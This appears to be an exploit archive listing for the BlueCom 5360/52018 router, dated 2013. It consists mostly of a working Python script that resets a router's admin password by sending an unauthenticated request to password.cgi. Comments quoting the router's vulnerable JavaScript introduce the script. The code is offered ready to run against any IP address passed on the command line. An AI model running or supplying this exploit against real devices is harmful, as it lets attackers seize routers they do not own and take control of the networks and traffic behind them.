BlueCom router model 5360/52018 remote password reset exploit.
1df37516e18bbd05eb9e2493cc89692b26c7b3fde30f10df5fca3d6f671c146f# Exploit Title: BLUE COM Router - 5360/52018 Password Reset Exploit
# Date: 20/1/2013
# Exploit Author: KAI (kaisai12)
# Home: CEH.VN
# Version: BCOM - 5360
# vulnerability - change password easy ! no protect !
#var loc = 'password.cgi?';
#switch ( idx ) {
# case 2:
# loc += 'sptPassword=' + encodeUrl(pwdNew.value);
# break;
# case 3:
# loc += 'usrPassword=' + encodeUrl(pwdNew.value);
# break;
# default:
# loc += 'sysPassword=' + encodeUrl(pwdNew.value);
# break;
# }
#
# var code = 'location="' + loc + '"';
# eval(code);
# }
#}
import urllib
import sys
def attackrouter(ip,password):
try:
params = urllib.urlencode({'sysPassword': str(password)})
f = urllib.urlopen("http://"+ip+"/password.cgi?%s" % params)
print "[+] IP: %s - Reset password: %s" % (ip,password)
return
except:
print "[-] error"
def main():
if len(sys.argv) > 2:
ip = sys.argv[1]
password = sys.argv[2]
print "--------------------------------------------------"
print "Router BCOM Exploit Execute Reset password modem "
print " author: KAI(CEH>VN) "
print "--------------------------------------------------"
print "[+] Sending exploit: OK"
attackrouter(ip,password)
else:
print "[-] Command error"
print "[-] Use:bluecomRT.py <ip> <password>"
if __name__ == '__main__':
main()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed